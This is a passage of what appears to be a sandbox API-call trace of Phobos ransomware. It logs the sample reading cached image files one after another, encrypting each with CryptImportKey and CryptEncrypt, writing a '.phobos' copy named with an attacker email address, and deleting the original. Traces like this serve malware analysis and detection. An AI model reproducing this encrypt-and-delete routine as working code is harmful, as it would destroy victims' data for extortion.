Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.287] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2803) returned 1 [0182.287] CloseHandle (hObject=0x15c) returned 1 [0182.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg")) returned 0x2020 [0182.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.288] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.288] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0182.288] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.288] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xaf3, lpOverlapped=0x0) returned 1 [0182.460] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb00, dwBufLen=0xb00 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb00) returned 1 [0182.460] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb00, lpOverlapped=0x0) returned 1 [0182.461] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0182.461] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.461] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0182.461] CryptDestroyKey (hKey=0xa327e8) returned 1 [0182.461] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0182.461] CryptDestroyKey (hKey=0xa32d68) returned 1 [0182.461] CloseHandle (hObject=0x15c) returned 1 [0182.461] CloseHandle (hObject=0x180) returned 1 [0182.461] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0tci[1].jpg")) returned 1 [0182.462] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0182.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.463] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1676) returned 1 [0182.463] CloseHandle (hObject=0x180) returned 1 [0182.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg")) returned 0x2020 [0182.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.463] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.463] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0182.469] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0182.470] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.470] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x68c, lpOverlapped=0x0) returned 1 [0182.682] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x690, dwBufLen=0x690 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x690) returned 1 [0182.682] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x690, lpOverlapped=0x0) returned 1 [0182.683] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0182.683] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.683] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0182.683] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.683] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0182.683] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0182.683] CloseHandle (hObject=0x180) returned 1 [0182.683] CloseHandle (hObject=0x14c) returned 1 [0182.683] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDGTbx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdgtbx[1].jpg")) returned 1 [0182.684] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0182.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0182.684] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=644) returned 1 [0182.684] CloseHandle (hObject=0x14c) returned 1 [0182.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png")) returned 0x2020 [0182.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0182.685] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.685] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.685] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0182.685] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.685] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x284, lpOverlapped=0x0) returned 1 [0182.984] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290, dwBufLen=0x290 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290) returned 1 [0182.984] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x290, lpOverlapped=0x0) returned 1 [0182.985] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0182.985] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.985] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0182.985] CryptDestroyKey (hKey=0xa32d68) returned 1 [0182.985] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0182.985] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0182.985] CloseHandle (hObject=0x14c) returned 1 [0182.985] CloseHandle (hObject=0x180) returned 1 [0182.985] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png")) returned 1 [0182.986] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0182.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.986] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=693) returned 1 [0182.986] CloseHandle (hObject=0x180) returned 1 [0182.986] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png")) returned 0x2020 [0182.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0182.987] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.987] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0182.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0182.990] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0182.990] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0182.990] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b5, lpOverlapped=0x0) returned 1 [0183.556] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0, dwBufLen=0x2c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0) returned 1 [0183.556] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2c0, lpOverlapped=0x0) returned 1 [0183.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0183.557] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.557] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0183.557] CryptDestroyKey (hKey=0xa32d68) returned 1 [0183.557] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0183.557] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0183.557] CloseHandle (hObject=0x180) returned 1 [0183.557] CloseHandle (hObject=0x14c) returned 1 [0183.557] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png")) returned 1 [0183.558] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0183.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.559] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2595) returned 1 [0183.559] CloseHandle (hObject=0x14c) returned 1 [0183.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg")) returned 0x2020 [0183.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.560] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.560] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0183.560] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.560] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, 